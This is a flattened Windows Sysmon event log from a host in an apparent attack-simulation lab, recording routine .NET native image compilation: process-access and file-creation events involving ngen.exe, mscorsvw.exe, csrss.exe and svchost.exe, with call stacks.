51791 10341000x80000000000000006639Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:59.905{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-45B3-6000-8302-000000009A01}4004C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006638Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:59.905{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45B3-6000-8302-000000009A01}4004C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006637Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:59.718{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45B3-6000-8202-000000009A01}4920C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006636Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:59.702{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-45B3-6000-8202-000000009A01}4920C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006635Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:59.702{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45B3-6000-8202-000000009A01}4920C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006634Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:22:59.639{08A6967A-45B3-6000-8102-000000009A01}3084C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\c0c-0\System.IdentityModel.Selectors.dll2021-01-14 13:22:59.639 10341000x80000000000000006633Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:59.405{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45B3-6000-8102-000000009A01}3084C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006632Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:59.389{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-45B3-6000-8102-000000009A01}3084C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006631Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:59.389{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45B3-6000-8102-000000009A01}3084C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006630Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:59.264{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45B3-6000-8002-000000009A01}1312C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006629Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:59.249{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-45B3-6000-8002-000000009A01}1312C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006628Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:59.249{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45B3-6000-8002-000000009A01}1312C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006627Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:22:59.124{08A6967A-45B0-6000-7F02-000000009A01}4244C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1094-0\System.IdentityModel.dll2021-01-14 13:22:59.124 10341000x80000000000000006661Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:00.968{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45B4-6000-8902-000000009A01}3672C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006660Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:00.952{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-45B4-6000-8902-000000009A01}3672C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006659Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:00.952{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45B4-6000-8902-000000009A01}3672C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006658Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:00.890{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45B4-6000-8802-000000009A01}3532C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006657Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:00.890{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-45B4-6000-8802-000000009A01}3532C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006656Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:00.890{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45B4-6000-8802-000000009A01}3532C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006655Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:23:00.827{08A6967A-45B4-6000-8702-000000009A01}3552C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\de0-0\System.IO.Compression.FileSystem.dll2021-01-14 13:23:00.827 10341000x80000000000000006654Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:00.780{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45B4-6000-8702-000000009A01}3552C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006653Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:00.780{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-45B4-6000-8702-000000009A01}3552C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006652Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:00.780{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45B4-6000-8702-000000009A01}3552C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006651Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:00.749{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45B4-6000-8602-000000009A01}4712C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006650Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:00.733{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-45B4-6000-8602-000000009A01}4712C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006649Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:00.733{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45B4-6000-8602-000000009A01}4712C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006648Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:23:00.671{08A6967A-45B4-6000-8502-000000009A01}1636C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\664-0\System.IO.Compression.dll2021-01-14 13:23:00.671 10341000x80000000000000006647Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:00.530{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45B4-6000-8502-000000009A01}1636C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006646Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:00.514{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-45B4-6000-8502-000000009A01}1636C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 